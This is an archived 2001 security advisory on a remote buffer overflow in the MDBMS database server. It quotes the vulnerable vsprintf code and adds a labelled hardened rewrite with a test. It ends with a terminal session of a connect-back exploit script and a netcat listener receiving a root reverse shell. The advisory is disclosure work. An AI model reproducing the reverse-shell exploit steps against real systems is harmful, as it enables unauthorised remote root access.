Remote buffer overflow in MDBMS.

2001-06-14T00:00:00
ID SECURITYVULNS:DOC:1722
Type securityvulns
Reporter Securityvulns
Modified 2001-06-14T00:00:00

Description

Dear bugtraq readers,

MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and earlier contain an exploitable buffer overflow in the handling of the \s console command.

When a user passes large buffers to the server in the form of multiple lines, these are concatenated into a single buffer. A subsequent call to the \s command then causes the overflow.

Below is the faulty code (from interface.cc):

    void user::uprintf(char *s, ...)
    {
        char b[10000];                   // fixed-size stack buffer
        int len = strlen(outbuf), newlen;
        va_list ap;

        va_start(ap, s);
        vsprintf(b, s, ap);              // <---- unbounded write into b[10000]
        va_end(ap);
        newlen = strlen(b);
        while (newlen + len + 10 >= outsize)
            outbuf = (char *)realloc(outbuf, outsize += 1000);
        strcat(outbuf, b);
        FD_SET(fd, &parent->wmask);
    }
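A hardened counterpart of this routine, added here as an illustration and not taken from MDBMS or from Marty's fix: it measures the formatted length with vsnprintf, grows outbuf to fit, and writes into it directly, so no fixed-size stack buffer is involved. `struct conn` and `conn_printf` are hypothetical names standing in for the user object's outbuf/outsize fields.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Hypothetical stand-in for the outbuf/outsize state user::uprintf appends to. */
struct conn {
    char *outbuf;   /* pending output, NUL-terminated (NULL when empty) */
    size_t outsize; /* bytes allocated for outbuf */
};
/* Hardened counterpart of user::uprintf: measure with vsnprintf, grow outbuf,
 * then format straight into it, so no fixed-size stack buffer can overflow.
 * Returns 0 on success, -1 on a format error or allocation failure. */
int conn_printf(struct conn *c, const char *fmt, ...)
{
    va_list ap, ap2;
    size_t len = c->outbuf ? strlen(c->outbuf) : 0, want;
    int need;
    va_start(ap, fmt);
    va_copy(ap2, ap);                    /* the second pass needs a fresh list */
    need = vsnprintf(NULL, 0, fmt, ap);  /* measure only; writes nothing */
    va_end(ap);
    if (need < 0) { va_end(ap2); return -1; }
    want = len + (size_t)need + 1;       /* existing text + new text + NUL */
    if (want > c->outsize) {
        size_t newsize = c->outsize ? c->outsize : 1024;
        while (newsize < want) newsize *= 2;   /* geometric, not +1000 steps */
        char *p = realloc(c->outbuf, newsize);
        if (!p) { va_end(ap2); return -1; }
        c->outbuf = p; c->outsize = newsize;
    }
    vsnprintf(c->outbuf + len, c->outsize - len, fmt, ap2);
    va_end(ap2);
    return 0;
}
/* Constructed check: a 20000-byte line (twice the original b[10000]) followed
 * by a short one. Returns the buffered length, 20004, or 0 on failure. */
size_t demo_overlong_line(void)
{
    struct conn c = { NULL, 0 };
    char *big = malloc(20001);
    size_t n = 0;
    if (!big) return 0;
    memset(big, 'A', 20000); big[20000] = '\0';
    if (conn_printf(&c, "%s\n", big) == 0 && conn_printf(&c, "%s\n", "OK") == 0)
        n = strlen(c.outbuf);
    free(big); free(c.outbuf);
    return n;
}
```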

mu-b also found a buffer overflow in the "create database" handling. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed: table and database names are now limited to 128 bytes.

Information about the overflows was sent to marty@hinttech.com. He has now fixed the problems, and new versions of MDBMS can be found at: http://www.hinttech.com/mdbms/

We would like to thank Marty for his kind response and quick update.

Exploit example:

[teleh0r@localhost mdbms]$ ./mdbms-pms.pl

-- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001

Usage: ./mdbms-pms.pl -t <hostname> -b <back>

 -t <hostname>    : hostname to test
 -b <back>        : connect back to ip
 -p <port>        : port (default: 2223)
 -d <delay>       : delay before timeout
 -o <offset>      : offset
 -h               : return to heap

[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...

[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h

-- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001

-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...

-> * Successfully sent payload - good luck!

connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ % nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...

Exploit code attached.

Sincerely yours, teleh0r and mu-b

-- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard